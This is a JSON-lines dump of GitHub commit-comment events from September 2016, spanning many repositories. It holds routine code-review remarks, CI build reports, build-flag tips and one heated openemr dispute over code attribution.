{"id":"4572281292","type":"CommitCommentEvent","actor":{"login":"ccwufu"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":19048821,"position":null,"line":null,"path":null,"commit_id":"63e25f9ad396b28f6a91cadddcfec9fe9295ea83","created_at":"2016-09-16T05:41:30Z","updated_at":"2016-09-16T05:41:30Z","body":"关于vps 64 ; pass 64 动态链接的问题.\r\ngox 已经有人报过,也有解决方案.\r\nhttps://github.com/mitchellh/gox/issues/55\r\n\r\n1)\r\nsetting the environment variable CGO_ENABLED=0 will make all binaries, including the native one, static. I tested this on go 1.5 and 1.6. I assume the behavior won't change for a while.\r\n\r\nExample:\r\n\r\n$ **env CGO_ENABLED=0** gox -os='linux darwin' -arch='amd64 ppc64le' ./...\r\n\r\n或\r\n2)\r\nWe're just calling go build with no additional flags. We export flags such as ldflags so you can customize this and probably unify the behavior.\r\n\r\ngox -ldflags=\"-s\""}},"created_at":"2016-09-16T05:41:30Z"}
{"id":"4572281847","type":"CommitCommentEvent","actor":{"login":"bartbroere"},"repo":{"name":"bartbroere/PythonPusherClient"},"payload":{"comment":{"id":19048824,"position":null,"line":null,"path":null,"commit_id":"2d3188c0e20f92e020b0e3a88b03289556bda1b3","created_at":"2016-09-16T05:41:43Z","updated_at":"2016-09-16T05:41:43Z","body":"There seems to be a bit of a war between my editors (on Windows and Debian). The actual changes are in line 9 (channel.py) and 62 (connection.py)."}},"created_at":"2016-09-16T05:41:43Z"}
{"id":"4572282097","type":"CommitCommentEvent","actor":{"login":"craigcartmell"},"repo":{"name":"dynamic-do/react-toolbox"},"payload":{"comment":{"id":19048825,"position":3,"line":35,"path":"components/overlay/Overlay.js","commit_id":"bcb091bbf9fc21d764ca6fa697c344de4f23b253","created_at":"2016-09-16T05:41:50Z","updated_at":"2016-09-16T05:41:50Z","body":"They're probably going to tell you to use single quotes if you submit this PR."}},"created_at":"2016-09-16T05:41:50Z"}
{"id":"4572282322","type":"CommitCommentEvent","actor":{"login":"yakovru"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19048827,"position":null,"line":null,"path":null,"commit_id":"7bba76a21cae74e97da74b13f8ffed81b60ef793","created_at":"2016-09-16T05:41:56Z","updated_at":"2016-09-16T05:41:56Z","body":"Fixed."}},"created_at":"2016-09-16T05:41:56Z"}
{"id":"4572285339","type":"CommitCommentEvent","actor":{"login":"benmarwick"},"repo":{"name":"aaronwolen/mjbtramp"},"payload":{"comment":{"id":19048833,"position":null,"line":null,"path":null,"commit_id":"1e15715ff8baa07ba8654a3ed987c081469b7543","created_at":"2016-09-16T05:43:17Z","updated_at":"2016-09-16T05:43:17Z","body":"Yes, I've wondered about this. I work on both Windows and Linux, so if I just keep the binaries then I can't use them on the other OS. But if I've got the sources then I can build the packages on both OSs. \r\n\r\nMy projects often span a few years, so quite a bit can change in the packages I use. I've been bitten by that a few times. So keeping track of the package versions is something I'm keen on. It does add quite a bit of bulk to the compendium though. \r\n\r\nAn alternative approach that I'm currently looking into is the [`checkpoint`](https://cran.r-project.org/web/packages/checkpoint/vignettes/checkpoint.html) package. This can download sources for specific package versions, unlike CRAN with always delivers the most recent. That would avoid having to store all the package files locally. However, I also often work offline, so having the package sources with me is useful. So I'm still a bit up in the air about the best solution to the problem of managing package versions. What's your experience with this?"}},"created_at":"2016-09-16T05:43:17Z"}
{"id":"4572285525","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19048834,"position":null,"line":null,"path":null,"commit_id":"baea7bcb7db7430fd6431b571b3c3cb78b8afb00","created_at":"2016-09-16T05:43:22Z","updated_at":"2016-09-16T05:43:22Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1190 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baea7bcb7db7430fd6431b571b3c3cb78b8afb00-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baea7bcb7db7430fd6431b571b3c3cb78b8afb00-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.83%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baea7bcb7db7430fd6431b571b3c3cb78b8afb00-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-16T05:43:22Z"}
{"id":"4572287313","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19048836,"position":null,"line":null,"path":null,"commit_id":"e9152cb1e85d9bdec5dc248a7366c683af530cb4","created_at":"2016-09-16T05:44:12Z","updated_at":"2016-09-16T05:44:12Z","body":"YES!\r\n\r\nLet's hangout tomorrow need to tell you a few things, some philosophical.\r\n\r\nThank you!"}},"created_at":"2016-09-16T05:44:12Z"}
{"id":"4572287652","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19048837,"position":null,"line":null,"path":null,"commit_id":"baea7bcb7db7430fd6431b571b3c3cb78b8afb00","created_at":"2016-09-16T05:44:19Z","updated_at":"2016-09-16T05:44:19Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baea7bcb7db7430fd6431b571b3c3cb78b8afb00-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T05:44:19Z"}
{"id":"4572290594","type":"CommitCommentEvent","actor":{"login":"andreabedini"},"repo":{"name":"PyTables/PyTables"},"payload":{"comment":{"id":19048841,"position":null,"line":null,"path":null,"commit_id":"11bd422201b674b60fb46439f68eb28d74356e40","created_at":"2016-09-16T05:45:37Z","updated_at":"2016-09-16T05:45:37Z","body":"> @andreabedini the line throws a UnicodeEncodeError on all strings containing non ascii characters. str is a bytestring in python 2.\r\n\r\nyeah but where do those strings come from? I thought it was just our docs. This is likely the same issue as #514 but in numpydoc (I am assuming `doc` in the code is some numpydoc object)."}},"created_at":"2016-09-16T05:45:37Z"}
{"id":"4572292832","type":"CommitCommentEvent","actor":{"login":"gottesmm"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19048846,"position":5,"line":1266,"path":"lib/Serialization/DeserializeSIL.cpp","commit_id":"670ba8a3fc3c006fb438fee065285e046aa9bbef","created_at":"2016-09-16T05:46:34Z","updated_at":"2016-09-16T05:46:34Z","body":"But please don't add default, please add cases for each specific case. (We want to keep this switch covered)."}},"created_at":"2016-09-16T05:46:34Z"}
{"id":"4572295123","type":"CommitCommentEvent","actor":{"login":"meraks"},"repo":{"name":"meraks/hello-world"},"payload":{"comment":{"id":19048850,"position":null,"line":null,"path":null,"commit_id":"56215951bbfe78c77cf3222ec88add8f16b7c8f5","created_at":"2016-09-16T05:47:42Z","updated_at":"2016-09-16T05:47:42Z","body":"Hi,humans.How are you?\r\n"}},"created_at":"2016-09-16T05:47:42Z"}
{"id":"4572298060","type":"CommitCommentEvent","actor":{"login":"TempID"},"repo":{"name":"TempID/HelloWorld"},"payload":{"comment":{"id":19048858,"position":null,"line":null,"path":null,"commit_id":"28eb24eb9e57a8dd6ad3c9dbb6f4db8db7c17390","created_at":"2016-09-16T05:49:05Z","updated_at":"2016-09-16T05:49:05Z","body":"？？？"}},"created_at":"2016-09-16T05:49:05Z"}
{"id":"4572305774","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19048866,"position":null,"line":null,"path":null,"commit_id":"baea7bcb7db7430fd6431b571b3c3cb78b8afb00","created_at":"2016-09-16T05:52:23Z","updated_at":"2016-09-16T05:52:23Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (rraustad) - i386-Windows-7-VisualStudio-12: OK (2329 of 2336 tests passed, 1 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MTR small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baea7bcb7db7430fd6431b571b3c3cb78b8afb00-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baea7bcb7db7430fd6431b571b3c3cb78b8afb00-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T05:52:23Z"}
{"id":"4572307870","type":"CommitCommentEvent","actor":{"login":"3nids"},"repo":{"name":"qwat/qwat-data-model"},"payload":{"comment":{"id":19048873,"position":50,"line":109,"path":"ordinary_data/valve/tr_valve_pipe.sql","commit_id":"1d6100e5522e0b2e19fa3a31e9a77cb296378311","created_at":"2016-09-16T05:53:17Z","updated_at":"2016-09-16T05:53:17Z","body":"reste des commentaires"}},"created_at":"2016-09-16T05:53:17Z"}
{"id":"4572308082","type":"CommitCommentEvent","actor":{"login":"3nids"},"repo":{"name":"qwat/qwat-data-model"},"payload":{"comment":{"id":19048876,"position":14,"line":91,"path":"ordinary_data/valve/tr_valve_pipe.sql","commit_id":"1d6100e5522e0b2e19fa3a31e9a77cb296378311","created_at":"2016-09-16T05:53:22Z","updated_at":"2016-09-16T05:53:22Z","body":"reste des commentaires"}},"created_at":"2016-09-16T05:53:22Z"}
{"id":"4572308871","type":"CommitCommentEvent","actor":{"login":"3nids"},"repo":{"name":"qwat/qwat-data-model"},"payload":{"comment":{"id":19048880,"position":null,"line":null,"path":null,"commit_id":"1d6100e5522e0b2e19fa3a31e9a77cb296378311","created_at":"2016-09-16T05:53:45Z","updated_at":"2016-09-16T05:53:45Z","body":"Thanks a lot!\r\nJust remaining a few comments"}},"created_at":"2016-09-16T05:53:45Z"}
{"id":"4572309393","type":"CommitCommentEvent","actor":{"login":"itchyny"},"repo":{"name":"lambdalisue/vim-gita"},"payload":{"comment":{"id":19048882,"position":11,"line":85,"path":"autoload/gita/content/blame_view.vim","commit_id":"9e6b916028762dec9bab4b9f836b3bb561d0d7c5","created_at":"2016-09-16T05:54:00Z","updated_at":"2016-09-16T05:54:00Z","body":"debug message?"}},"created_at":"2016-09-16T05:54:00Z"}
{"id":"4572310781","type":"CommitCommentEvent","actor":{"login":"IrcDirk"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19048884,"position":349,"line":3013,"path":"Carbonite.Quests/NxQuest.lua","commit_id":"5c5002d75cc3e3bc5b134b68a6a8304a37d25217","created_at":"2016-09-16T05:54:36Z","updated_at":"2016-09-16T05:54:36Z","body":"Stil u are asuming that someone has god computer and those files will be parsed in in time for SortQuestDB, also on faster computers this can be done much faster than 1s.\r\n\r\nAs for RecordQuestLog i didnt test it... so we should find better way to find out when to run this function."}},"created_at":"2016-09-16T05:54:36Z"}
{"id":"4572311824","type":"CommitCommentEvent","actor":{"login":"CMRemix"},"repo":{"name":"CMRemix/android_device_samsung_trltetmo"},"payload":{"comment":{"id":19048886,"position":null,"line":null,"path":null,"commit_id":"f8e413dca09ff700163152eb25853647c4ce5ad5","created_at":"2016-09-16T05:55:02Z","updated_at":"2016-09-16T05:55:02Z","body":"I complete compile to the end but face one last error when it generate zip file. let me post \r\nthe log and hopefully you can help me. Thanks"}},"created_at":"2016-09-16T05:55:02Z"}
{"id":"4572324325","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19048921,"position":null,"line":null,"path":null,"commit_id":"e0c366128407428563066fee10ed340712591ae2","created_at":"2016-09-16T06:00:25Z","updated_at":"2016-09-16T06:00:25Z","body":"Related to: backdrop/backdrop-issues#2155 "}},"created_at":"2016-09-16T06:00:25Z"}
{"id":"4572324442","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"AlenOsmanagic/Zadace"},"payload":{"comment":{"id":19048924,"position":null,"line":null,"path":null,"commit_id":"37a50c70b84aff380d61af72a76693db848050e9","created_at":"2016-09-16T06:00:27Z","updated_at":"2016-09-16T06:00:27Z","body":"pozdrav\n\nstvarno ne znam. Ja se nikad nisam bavio hackingtoshima...\n\n\n\n*Irfan Godinjak*\nM: +387 61 71 99 71\nE: irfan@godinjak.com\nL: http://ba.linkedin.com/in/godinjak\n\n2016-09-14 18:03 GMT+02:00 AlenOsmanagic <notifications@github.com>:\n\n> Pozdrav Irfane, popravio sam svoj laptop, uspostavio virtuelnu mašinu.\n> Međutim, koristio sam je nekih dvadesetak minuta ( ništa posebno otvorio\n> email, linkove što mi je Babac poslao, s namjerom da uradim zadaću) ali kad\n> sam pokrenuo XCode mašina se zamrzla. Ugasim. Upalim i dobijem error sa\n> slike koji sam ti poslao. Pokušao sam promjeniti postavke mašine, ne\n> uspjeva. I za hdd, i za procesor i za boot. Uglavnom, izgleda da sam opet\n> osuđen na ovaj iz hackintosh iz WIP-a do sljedeće sedmice dok mi ne stigne\n> MacBook. Ako išta znaš o ovome erroru, pošalji mi da probam riješiti.\n> Hvala.\n>\n> 2016-09-09 7:38 GMT+02:00 Alen Osmanagic <aosmanagic19@gmail.com>:\n>\n> > Ovaj u WIPu sam koristio zadnje dvije zadaće. Al ga sam ja koristim cini\n> > mi se. Jer kad god dodjem on je slobodan. Kazu kao razlog jer je stari\n> > Xcode na njemu.\n> >\n> > Dana 08.09.2016. 23:08, osoba \"irfanG\" <notifications@github.com> je\n> > napisala:\n> >\n> >> kakav ti imas racunar? jel neki hackintosh? mozda da vidis ovaj sto je u\n> >> wipu?\n> >>\n> >> —\n> >> You are receiving this because you are subscribed to this thread.\n> >> Reply to this email directly, view it on GitHub\n> >> <https://github.com/AlenOsmanagic/Zadace/commit/\n> 37a50c70b84aff380d61af72a76693db848050e9#commitcomment-18953065>,\n> >> or mute the thread\n> >> <https://github.com/notifications/unsubscribe-auth/\n> ATLjicjgmyasLAOnwPVAUsE1uVxC1tafks5qoHlqgaJpZM4J4dIZ>\n> >> .\n> >>\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/AlenOsmanagic/Zadace/commit/37a50c70b84aff380d61af72a76693db848050e9#commitcomment-19021660>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGfLV1W75zEGdFneeTRGQc3YVXojF7Whks5qqBq0gaJpZM4J4dIZ>\n> .\n>\n"}},"created_at":"2016-09-16T06:00:27Z"}
{"id":"4572327806","type":"CommitCommentEvent","actor":{"login":"mootpointer"},"repo":{"name":"mootpointer/quantum-elixir"},"payload":{"comment":{"id":19048949,"position":null,"line":null,"path":null,"commit_id":"922514f0cfcc1eaa8b3ffeb08fbb4aa734a16675","created_at":"2016-09-16T06:01:46Z","updated_at":"2016-09-16T06:01:46Z","body":"Yeah. I was going to PR, but there was no applicable branch."}},"created_at":"2016-09-16T06:01:46Z"}
{"id":"4572327962","type":"CommitCommentEvent","actor":{"login":"zazaviza"},"repo":{"name":"pawitp/muwifi-autologin"},"payload":{"comment":{"id":19048950,"position":null,"line":null,"path":null,"commit_id":"b4c914101afc877f1e7ae6f6297452780d7eb4f2","created_at":"2016-09-16T06:01:50Z","updated_at":"2016-09-16T06:01:50Z","body":"Ok"}},"created_at":"2016-09-16T06:01:50Z"}
{"id":"4572331178","type":"CommitCommentEvent","actor":{"login":"iMega"},"repo":{"name":"kubikvest/front"},"payload":{"comment":{"id":19048956,"position":7,"line":32,"path":"view/checkpoint.html","commit_id":"f9dc49d5ede3f61053cb564dc7eb8221e394af1c","created_at":"2016-09-16T06:03:11Z","updated_at":"2016-09-16T06:03:11Z","body":"Напиши что понравилось, вместе сделаем игру лучше!"}},"created_at":"2016-09-16T06:03:11Z"}
{"id":"4572332306","type":"CommitCommentEvent","actor":{"login":"ikamthania"},"repo":{"name":"LivelyGig/ProductWebUI"},"payload":{"comment":{"id":19048958,"position":5,"line":42,"path":"sclient/src/main/scala/synereo/client/utils/ContentUtils.scala","commit_id":"1fb35f9ea7396519cb674f920e10e7587d4c79bd","created_at":"2016-09-16T06:03:43Z","updated_at":"2016-09-16T06:03:43Z","body":"Hi Julia,\r\n\r\nAny reason we are using string comparison? I suppose earlier implementation with sort content does the same thing. The reason we need to avoid the string comparison to get the different types of data is because it is little inefficient and error prone. We are essentially iterating over the same response again which we don't require as such. Please do let me know if I missed something in previous implementation because with this string comparison our unit test for this unit is going to fail."}},"created_at":"2016-09-16T06:03:43Z"}
{"id":"4572332415","type":"CommitCommentEvent","actor":{"login":"DaMichel"},"repo":{"name":"opentrack/opentrack"},"payload":{"comment":{"id":19048959,"position":null,"line":null,"path":null,"commit_id":"dec625e51878c9167100837086f82fb0f78b0189","created_at":"2016-09-16T06:03:45Z","updated_at":"2016-09-16T06:03:45Z","body":"Alright. Too bad. So there is only the joystick code and opencv using COM, right? What if the joystick code is commented out?"}},"created_at":"2016-09-16T06:03:45Z"}
{"id":"4572335258","type":"CommitCommentEvent","actor":{"login":"tomkooij"},"repo":{"name":"PyTables/PyTables"},"payload":{"comment":{"id":19048962,"position":null,"line":null,"path":null,"commit_id":"11bd422201b674b60fb46439f68eb28d74356e40","created_at":"2016-09-16T06:04:58Z","updated_at":"2016-09-16T06:04:58Z","body":"The error:\r\n\r\n```\r\n File \"/tom/PyTables/doc/sphinxext/numpydoc.py\", line 45, in mangle_docstrings\r\n    lines[:] = str(doc).split(\"\\n\")\r\nUnicodeEncodeError: 'ascii' codec can't encode character u'\\u2019' in position 1550: ordinal not in range(128)\r\n```\r\nYes, I agree, it is the same type of error (unicode to bytestring) as the referenced issue.\r\n\r\nUnicode 2019 is a single quote (right apostrophe). So that's probably abundant in docstrings.\r\n\r\nnumpydoc basically handles this the same way: [numpydoc.py:L82](https://github.com/numpy/numpydoc/blob/master/numpydoc/numpydoc.py#L82)"}},"created_at":"2016-09-16T06:04:58Z"}
{"id":"4572337917","type":"CommitCommentEvent","actor":{"login":"thomaspaulmann"},"repo":{"name":"arasu01/awesome-ios"},"payload":{"comment":{"id":19048968,"position":null,"line":null,"path":null,"commit_id":"b5ed21f3c659fb39c87733c4af498270729c7406","created_at":"2016-09-16T06:06:03Z","updated_at":"2016-09-16T06:06:03Z","body":"@nschucky Yeah... Great to see this one here :-) "}},"created_at":"2016-09-16T06:06:03Z"}
{"id":"4572339695","type":"CommitCommentEvent","actor":{"login":"desireluqilai"},"repo":{"name":"WujuSan/EloBuddy"},"payload":{"comment":{"id":19048970,"position":null,"line":null,"path":null,"commit_id":"0e71aeb65b79ba4a229858a554736befd6958a82","created_at":"2016-09-16T06:06:47Z","updated_at":"2016-09-16T06:06:47Z","body":"Why China's of legend league can not be used？ \r\nHope to be able to get a reply thank you very much."}},"created_at":"2016-09-16T06:06:47Z"}
{"id":"4572341607","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19048974,"position":null,"line":null,"path":null,"commit_id":"7db6bdda8c09efc70c9c53f93d7ae0c4241358a3","created_at":"2016-09-16T06:07:15Z","updated_at":"2016-09-16T06:07:15Z","body":"Related to: backdrop/backdrop-issues#2202 "}},"created_at":"2016-09-16T06:07:15Z"}
{"id":"4572342537","type":"CommitCommentEvent","actor":{"login":"MrCsabaToth"},"repo":{"name":"gdgfresno/valleydevfest"},"payload":{"comment":{"id":19048975,"position":null,"line":null,"path":null,"commit_id":"423e01f9d8627eda06b0589258618ca64b2b0232","created_at":"2016-09-16T06:07:38Z","updated_at":"2016-09-16T06:07:38Z","body":"Fixes #15 "}},"created_at":"2016-09-16T06:07:38Z"}
{"id":"4572343525","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/ezark"},"payload":{"comment":{"id":19048976,"position":null,"line":null,"path":null,"commit_id":"0d6e0550bf7f5242555cf74a7aab7e7329625622","created_at":"2016-09-16T06:08:03Z","updated_at":"2016-09-16T06:08:03Z","body":"Weird: this version already exists."}},"created_at":"2016-09-16T06:08:03Z"}
{"id":"4572343592","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19048977,"position":null,"line":null,"path":null,"commit_id":"8291f0707071ed2022f13b8901cf253e7d252794","created_at":"2016-09-16T06:08:05Z","updated_at":"2016-09-16T06:08:05Z","body":"Related to: backdrop/backdrop-issues#2202 "}},"created_at":"2016-09-16T06:08:05Z"}
{"id":"4572344476","type":"CommitCommentEvent","actor":{"login":"MrCsabaToth"},"repo":{"name":"gdgfresno/valleydevfest"},"payload":{"comment":{"id":19048978,"position":null,"line":null,"path":null,"commit_id":"73e2785ba618e409e9a8dff141bd0700310b7d9e","created_at":"2016-09-16T06:08:28Z","updated_at":"2016-09-16T06:08:28Z","body":"Fixes #11"}},"created_at":"2016-09-16T06:08:28Z"}
{"id":"4572345325","type":"CommitCommentEvent","actor":{"login":"MrCsabaToth"},"repo":{"name":"gdgfresno/valleydevfest"},"payload":{"comment":{"id":19048980,"position":null,"line":null,"path":null,"commit_id":"01e8f81f8819dbfb3520840092974144acdd9ef2","created_at":"2016-09-16T06:08:49Z","updated_at":"2016-09-16T06:08:49Z","body":"Adds to #11 "}},"created_at":"2016-09-16T06:08:49Z"}
{"id":"4572350347","type":"CommitCommentEvent","actor":{"login":"KailasHiwale"},"repo":{"name":"KailasHiwale/Hello-World"},"payload":{"comment":{"id":19048987,"position":null,"line":null,"path":null,"commit_id":"f9b8775a9d2c8020e6d536aa4a55d960d5025043","created_at":"2016-09-16T06:10:53Z","updated_at":"2016-09-16T06:10:53Z","body":"ok nice"}},"created_at":"2016-09-16T06:10:53Z"}
{"id":"4572353165","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"openemr/openemr"},"payload":{"comment":{"id":19048990,"position":null,"line":null,"path":null,"commit_id":"00ca05981d066657c47feef302b1fc91026144bb","created_at":"2016-09-16T06:12:01Z","updated_at":"2016-09-16T06:12:01Z","body":"again:\r\n\"not 1 line of code was the same...\"\r\n\r\nbtw, Terry/Tony have brought in exact copies of our code commits into your fork without attribution and we have raised no issues with this. Either you are posturing to garner attention or you are simply not on the same page regarding sharing of ideas and code; either way, it is a bummer to see this behavior.\r\n\r\nOn a positive note, it's pretty awesome that at least 5 different folks are watching the OpenEMR codebase in that short amount of time; thanks for that compliment."}},"created_at":"2016-09-16T06:12:01Z"}
{"id":"4572356885","type":"CommitCommentEvent","actor":{"login":"andreabedini"},"repo":{"name":"PyTables/PyTables"},"payload":{"comment":{"id":19048998,"position":null,"line":null,"path":null,"commit_id":"11bd422201b674b60fb46439f68eb28d74356e40","created_at":"2016-09-16T06:13:46Z","updated_at":"2016-09-16T06:13:46Z","body":"> Unicode 2019 is a single quote (right apostrophe). So that's probably abundant in docstrings.\r\n\r\nah! gotcha! :)"}},"created_at":"2016-09-16T06:13:46Z"}
{"id":"4572359969","type":"CommitCommentEvent","actor":{"login":"staticfloat"},"repo":{"name":"slarew/julia"},"payload":{"comment":{"id":19049003,"position":null,"line":null,"path":null,"commit_id":"75fa2e15453af87be5900528bde5332d5e3b92ae","created_at":"2016-09-16T06:15:10Z","updated_at":"2016-09-16T06:15:10Z","body":"Is there a way we can tweak the `julia` processes entitlements instead of having a duplicate executable?"}},"created_at":"2016-09-16T06:15:10Z"}
{"id":"4572363003","type":"CommitCommentEvent","actor":{"login":"Scneemanger"},"repo":{"name":"Scneemanger/nospam"},"payload":{"comment":{"id":19049010,"position":5,"line":561,"path":"bot/tgland.lua","commit_id":"13b19db083f8f994aead9ccf24be9836263be559","created_at":"2016-09-16T06:16:31Z","updated_at":"2016-09-16T06:16:31Z","body":"Id: 227051954\r\n"}},"created_at":"2016-09-16T06:16:31Z"}
{"id":"4572365173","type":"CommitCommentEvent","actor":{"login":"Scneemanger"},"repo":{"name":"Scneemanger/nospam"},"payload":{"comment":{"id":19049013,"position":3,"line":560,"path":"bot/tgland.lua","commit_id":"13b19db083f8f994aead9ccf24be9836263be559","created_at":"2016-09-16T06:17:29Z","updated_at":"2016-09-16T06:17:29Z","body":"Id: 227051954\r\n\r\n"}},"created_at":"2016-09-16T06:17:29Z"}
{"id":"4572366849","type":"CommitCommentEvent","actor":{"login":"wonglkd"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19049017,"position":9,"line":23,"path":".gitignore","commit_id":"19ecff79eb272c295361c951fd8f4e92545856c4","created_at":"2016-09-16T06:18:10Z","updated_at":"2016-09-16T06:18:10Z","body":"Seeder files should definitely be in git repo and should not be ignored"}},"created_at":"2016-09-16T06:18:10Z"}
{"id":"4572369624","type":"CommitCommentEvent","actor":{"login":"SaatvikShukla"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19049022,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-16T06:19:20Z","updated_at":"2016-09-16T06:19:20Z","body":"@koradiavatsal How about some  vada-pav?"}},"created_at":"2016-09-16T06:19:20Z"}
{"id":"4572371797","type":"CommitCommentEvent","actor":{"login":"slawler"},"repo":{"name":"slawler/CoastalModeling"},"payload":{"comment":{"id":19049026,"position":null,"line":null,"path":null,"commit_id":"f8f3de70181316f9cd426986e70e34ced9290f6a","created_at":"2016-09-16T06:20:13Z","updated_at":"2016-09-16T06:20:13Z","body":"Remove Glob needed"}},"created_at":"2016-09-16T06:20:13Z"}
{"id":"4572372149","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-enterprise"},"payload":{"comment":{"id":19049027,"position":34,"line":838,"path":"xwiki-enterprise-web/pom.xml","commit_id":"9bfdab74f35bf8d0cf94b28979104de1f0a74cec","created_at":"2016-09-16T06:20:21Z","updated_at":"2016-09-16T06:20:21Z","body":"grrr, thanks Marius!"}},"created_at":"2016-09-16T06:20:21Z"}
{"id":"4572374619","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-enterprise"},"payload":{"comment":{"id":19049032,"position":34,"line":838,"path":"xwiki-enterprise-web/pom.xml","commit_id":"9bfdab74f35bf8d0cf94b28979104de1f0a74cec","created_at":"2016-09-16T06:21:20Z","updated_at":"2016-09-16T06:21:20Z","body":"err wait, why? :)"}},"created_at":"2016-09-16T06:21:20Z"}
{"id":"4572374835","type":"CommitCommentEvent","actor":{"login":"shaunhughston"},"repo":{"name":"shaunhughston/shoppinglist2.0"},"payload":{"comment":{"id":19049033,"position":null,"line":null,"path":null,"commit_id":"7191cb7f1383c43e8dd21f23a04b0be30d68b5d1","created_at":"2016-09-16T06:21:25Z","updated_at":"2016-09-16T06:21:25Z","body":"Non interactive version of shopping list with form (non functional), list items (including strikethrough item) and CSS."}},"created_at":"2016-09-16T06:21:25Z"}
{"id":"4572375880","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-enterprise"},"payload":{"comment":{"id":19049034,"position":34,"line":838,"path":"xwiki-enterprise-web/pom.xml","commit_id":"9bfdab74f35bf8d0cf94b28979104de1f0a74cec","created_at":"2016-09-16T06:21:49Z","updated_at":"2016-09-16T06:21:49Z","body":"FTR all other deps are using project.version and this project is in platform."}},"created_at":"2016-09-16T06:21:49Z"}
{"id":"4572377582","type":"CommitCommentEvent","actor":{"login":"aethelwulffe"},"repo":{"name":"openemr/openemr"},"payload":{"comment":{"id":19049039,"position":null,"line":null,"path":null,"commit_id":"00ca05981d066657c47feef302b1fc91026144bb","created_at":"2016-09-16T06:22:28Z","updated_at":"2016-09-16T06:22:28Z","body":"Annnd were is this code without mention or attribution that Mr. Tony has \nfast-forward committed?  The short amount of time and the code watching \nis you, which is indeed fine...  We rather like the fact that you are \npicking up stuff from the LibreHealth organization, and think it is \nfunny that you are doing the lone-wolf merges to your master branch \nbefore the Libre gang has gone through the process of review and \napproval...within minutes. Sticking to your story, while denying on \nproposed merits, and still deflecting.  The code is F60.2.\n\nGo ahead.  Have the last word....That is a Cluster B as well.\n\n\nOn 2016-09-16 02:12 AM, Brady Miller wrote:\n>\n> again:\n> \"not 1 line of code was the same...\"\n>\n> btw, Terry/Tony have brought in exact copies of our code commits into \n> your fork without attribution and we have raised no issues with this. \n> Either you are posturing to garner attention or you are simply not on \n> the same page regarding sharing of ideas and code; either way, it is a \n> bummer to see this behavior.\n>\n> On a positive note, it's pretty awesome that at least 5 different \n> folks are watching the OpenEMR codebase in that short amount of time; \n> thanks for that compliment.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/openemr/openemr/commit/00ca05981d066657c47feef302b1fc91026144bb#commitcomment-19048990>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AAhzF2WwzqK2g5NshBIx_REZ_bqLsu_Mks5qqjMzgaJpZM4J-iJR>.\n>\n\n"}},"created_at":"2016-09-16T06:22:28Z"}
